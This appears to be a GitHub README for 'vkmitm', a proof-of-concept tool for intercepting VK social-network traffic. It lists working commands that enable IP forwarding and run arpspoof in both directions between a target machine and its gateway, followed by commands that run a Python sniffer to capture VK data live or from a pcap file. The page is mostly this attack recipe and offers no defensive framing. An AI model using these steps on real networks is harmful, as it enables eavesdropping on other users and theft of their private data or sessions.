darker0n / vkmitm

PoC for sniffing data for vk

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Using

Tested on MacOs X, with dsniff from macports.

Start arp spoofing:

Target - 192.168.2.151 Gate - 192.168.2.1

$ sudo sysctl -w net.inet.ip.forwarding=1
$ sudo arpspoof -i en1 -t 192.168.2.151 192.168.2.1
$ sudo arpspoof -i en1 -t 192.168.2.1 192.168.2.151

Sniffing data on en1:

$ sudo ./sniff_vk.py -i en1

Parsing pcap file:

$ sudo ./sniff_vk.py -p test.pcap

vkmitm

About

PoC for sniffing data for vk

License:MIT License


Languages

Language:Python 100.0%